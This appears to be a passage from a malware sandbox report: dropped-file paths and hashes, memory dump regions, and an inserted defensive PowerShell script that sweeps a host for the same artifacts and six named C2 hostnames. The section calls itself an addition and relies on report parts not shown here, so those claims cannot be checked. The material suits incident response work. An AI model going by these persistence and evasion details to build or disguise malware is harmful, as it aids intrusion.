SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 64B
MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 64B
MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Temp\dhylty.bat
Filesize 325KB
MD5 c3a6545c16eee6297947ed8620de4717
SHA1 4debd4e38ad82335e0a6eea50a52259cf3ccf4ae
SHA256 3152854e19471a68674c0e8c61822a78e4c5fc159c03f9635b647570a4d91ddb
SHA512 3dd9e1f43e67bf52b311f18afc8adce4ee3086ab226532453a559a0e644c6772ea4bf3fa25c54a917486156b9c0014c2296e9f58e8b7e4f49033cef967e215a8
-
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe
Filesize 442KB
MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
Filesize 822KB
MD5 775a301382aacf4b63ff30d3f96064d1
SHA1 259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256 f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512 048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Local\Temp\mbekur.exe
Filesize 753KB
MD5 d47ef0caf476ae21f22c346071670ffd
SHA1 b61fda99693875bc3959d0530debaa2e71587584
SHA256 3372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57
SHA512 1b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba
-
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
Filesize 442KB
MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe
Filesize 822KB
MD5 775a301382aacf4b63ff30d3f96064d1
SHA1 259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256 f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512 048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Public\Libraries\KDECO.bat
Filesize 155B
MD5 213c60adf1c9ef88dc3c9b2d579959d2
SHA1 e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA256 37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512 fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
-
C:\Users\Public\Libraries\OxzfbvmfO.bat
Filesize 411B
MD5 55aba243e88f6a6813c117ffe1fa5979
SHA1 210b9b028a4b798c837a182321dbf2e50d112816
SHA256 5a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2
SHA512 68009c4c9bbea75a3bfa9f79945d30957a95691ea405d031b4ca7f1cb47504bbc768fcae59173885743ad4d6cfdd2313c3fe0acb515e34e5c809ecdc7f45e307
-
C:\Users\Public\Libraries\easinvoker.exe
Filesize 128KB
MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Users\Public\Libraries\netutils.dll
Filesize 109KB
MD5 08aecbf3114e569921df32fb5c8a1dd6
SHA1 9e2fd6ba9b66844292fb49a79fc874ad52f5ecba
SHA256 7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2
SHA512 e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57
-
C:\Windows \System32\easinvoker.exe
Filesize 128KB
MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\netutils.dll
Filesize 109KB
MD5 08aecbf3114e569921df32fb5c8a1dd6
SHA1 9e2fd6ba9b66844292fb49a79fc874ad52f5ecba
SHA256 7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2
SHA512 e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57
-
C:\windows \system32\KDECO.bat
Filesize 155B
MD5 213c60adf1c9ef88dc3c9b2d579959d2
SHA1 e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA256 37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512 fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
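The dropped-file list above, together with the Run values, the Defender exclusion, the scheduled task and the C2 hostnames from Malware Config, is enough for a host sweep. The script below is an added example, not part of the sandbox report: it looks for each artifact at the paths the report records (across every profile under C:\Users, since the affected account need not be the one running the sweep), hashes what it finds and compares against the report's SHA256 values. Two points are assumptions rather than report facts: the report shows mynew.bat.exe and dhylty.bat.exe sharing one 442KB hash and a powershell.exe-style command line, so the script also compares any `*.bat.exe` it finds against the host's own powershell.exe to test the renamed-copy inference; and `Get-MpPreference`, `Get-ScheduledTask` and `Get-DnsClientCache` are the stock Windows 10 cmdlets, which need an elevated session.

```powershell
# Added triage example (not from the sandbox report): sweep a host for the artifacts the
# report lists. Run elevated on Windows 10+. Hashes are the report's SHA256 values.
$ReportSha256 = @{
    'mbekur.exe'     = '3372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57'
    'jjweiy.exe'     = 'f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f'
    'Host.exe'       = 'f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f'
    'easinvoker.exe' = '30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96'
    'netutils.dll'   = '7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2'
    'KDECO.bat'      = '37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e'
    'OxzfbvmfO.bat'  = '5a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2'
    'dhylty.bat'     = '3152854e19471a68674c0e8c61822a78e4c5fc159c03f9635b647570a4d91ddb'
    'dhylty.bat.exe' = '9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f'
    'mynew.bat.exe'  = '9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f'
}
# C2 names from the Remcos and NetWire configs in Malware Config
$C2Hosts = 'retsuportm.ddnsfree.com', 'spreadrem1.ddnsfree.com',
           'febnew1.ddns.net', 'febnew2.ddns.net', 'febnew4.ddns.net', 'febnew5.ddns.net'
# Assumption under test: <name>.bat.exe is a copy of the host's powershell.exe.
$PowerShellHash = (Get-FileHash -LiteralPath "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" -Algorithm SHA256).Hash.ToLower()

function Get-FileFinding([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return }
    $hash = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash.ToLower()
    $name = Split-Path -Leaf $Path
    $status = if ($ReportSha256[$name] -eq $hash) { 'matches report hash' } else { 'present, hash differs from report' }
    if ($name -like '*.bat.exe' -and $hash -eq $PowerShellHash) { $status += '; same hash as this host''s powershell.exe' }
    [pscustomobject]@{ Type = 'file'; Item = $Path; Detail = "$hash ($status)" }
}

function Invoke-Triage {
    # 1. Dropped files at the report's paths, for every profile, plus any <name>.bat.exe in a Temp folder.
    $fileGlobs = @(
        'C:\Users\*\AppData\Roaming\Install\Host.exe',
        'C:\Users\*\AppData\Local\Temp\mbekur.exe',
        'C:\Users\*\AppData\Local\Temp\jjweiy.exe',
        'C:\Users\*\AppData\Local\Temp\dhylty.bat',
        'C:\Users\*\AppData\Local\Temp\*.bat.exe',
        'C:\Users\Public\Libraries\*'
    )
    foreach ($g in $fileGlobs) {
        Get-ChildItem -Path $g -File -Force -ErrorAction SilentlyContinue | ForEach-Object { Get-FileFinding $_.FullName }
    }

    # 2. Mock "C:\Windows \System32" (trailing space in "Windows "); -LiteralPath keeps the space.
    $mock = 'C:\Windows \System32'
    if (Test-Path -LiteralPath $mock) {
        [pscustomobject]@{ Type = 'dir'; Item = $mock; Detail = 'mock system directory exists' }
        Get-ChildItem -LiteralPath $mock -File -Force -ErrorAction SilentlyContinue | ForEach-Object { Get-FileFinding $_.FullName }
    }

    # 3. Run values pointing at .url files under C:\Users\Public\Libraries, in every loaded user hive.
    #    (PS* properties are PowerShell's own path metadata, not registry values.)
    Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            foreach ($prop in $key.PSObject.Properties) {
                if ($prop.Name -notlike 'PS*' -and "$($prop.Value)" -like 'C:\Users\Public\Libraries\*.url') {
                    [pscustomobject]@{ Type = 'runkey'; Item = "$($key.PSPath)\$($prop.Name)"; Detail = $prop.Value }
                }
            }
        }

    # 4. Defender path exclusion set by KDECO.bat (Add-MpPreference -ExclusionPath 'C:\Users').
    try {
        (Get-MpPreference -ErrorAction Stop).ExclusionPath |
            Where-Object { $_ -and $_.TrimEnd('\') -ieq 'C:\Users' } |
            ForEach-Object { [pscustomobject]@{ Type = 'defender'; Item = 'ExclusionPath'; Detail = $_ } }
    } catch { [pscustomobject]@{ Type = 'defender'; Item = 'Get-MpPreference'; Detail = $_.Exception.Message } }

    # 5. Logon task registered by dhylty.bat.exe.
    $task = Get-ScheduledTask -TaskName 'Quasar Client Startup' -ErrorAction SilentlyContinue
    if ($task) {
        [pscustomobject]@{ Type = 'task'; Item = $task.TaskName; Detail = (($task.Actions | ForEach-Object { $_.Execute }) -join '; ') }
    }

    # 6. Resolver cache entries for the C2 names.
    Get-DnsClientCache -ErrorAction SilentlyContinue |
        Where-Object { $C2Hosts -contains $_.Entry } |
        ForEach-Object { [pscustomobject]@{ Type = 'dns'; Item = $_.Entry; Detail = $_.Data } }
}

Invoke-Triage | Format-Table -AutoSize -Wrap
```

A file that is present but whose hash differs from the report is still worth keeping: the loader names (mbekur.exe, jjweiy.exe) and the Public\Libraries staging directory are the stable part of this chain, the payload bytes are not. A clean result from step 6 means little on its own, because the cache is short-lived and the `.ddns.net` / `.ddnsfree.com` names resolve to whatever the operator points them at; proxy or DNS server logs are the durable source for those names.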
-
memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmp (272KB)
memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmp (276KB)
memory/760-193-0x0000000000000000-mapping.dmp
memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmp (276KB)
memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmp (272KB)
memory/860-151-0x0000000000000000-mapping.dmp
memory/876-166-0x0000000000000000-mapping.dmp
memory/960-171-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/960-168-0x0000000000000000-mapping.dmp
memory/1200-212-0x0000000000000000-mapping.dmp
memory/1200-216-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/1200-226-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/1200-218-0x0000022572EF0000-0x0000022572F40000-memory.dmp (320KB)
memory/1200-220-0x0000022573620000-0x00000225737E2000-memory.dmp (1.8MB)
memory/1200-219-0x0000022573000000-0x00000225730B2000-memory.dmp (712KB)
memory/1420-211-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/1420-204-0x0000000000000000-mapping.dmp
memory/1420-209-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/1440-140-0x0000000000000000-mapping.dmp
memory/1476-178-0x0000000000000000-mapping.dmp
memory/1716-160-0x0000000000000000-mapping.dmp
memory/1732-143-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/1732-141-0x0000000000000000-mapping.dmp
memory/1732-146-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmp (272KB)
memory/2040-221-0x0000000000000000-mapping.dmp
memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmp (276KB)
memory/2316-210-0x0000000000000000-mapping.dmp
memory/2532-199-0x0000000000000000-mapping.dmp
memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmp (188KB)
memory/2580-152-0x0000000000000000-mapping.dmp
memory/2612-157-0x0000000000000000-mapping.dmp
memory/2892-154-0x0000000000000000-mapping.dmp
memory/2964-173-0x0000000000400000-0x0000000000480000-memory.dmp (512KB)
memory/2964-172-0x0000000000000000-mapping.dmp
memory/2964-188-0x0000000000400000-0x000000000047F095-memory.dmp (508KB)
memory/2964-177-0x0000000000400000-0x000000000047F095-memory.dmp (508KB)
memory/2964-176-0x0000000000400000-0x0000000000480000-memory.dmp (512KB)
memory/2964-175-0x0000000000400000-0x0000000000480000-memory.dmp (512KB)
memory/3184-158-0x0000000000000000-mapping.dmp
memory/3200-144-0x0000000000000000-mapping.dmp
memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmp (188KB)
memory/3344-149-0x0000000000000000-mapping.dmp
memory/3444-179-0x0000000000000000-mapping.dmp
memory/3444-181-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/3444-185-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/3808-203-0x0000000000000000-mapping.dmp
memory/3828-155-0x0000000000000000-mapping.dmp
memory/4124-165-0x0000000000000000-mapping.dmp
memory/4536-139-0x0000029273360000-0x000002927337E000-memory.dmp (120KB)
memory/4536-138-0x00000292737B0000-0x0000029273826000-memory.dmp (472KB)
memory/4536-137-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
memory/4536-135-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp (10.8MB)
mem/4536-134 placeholder removed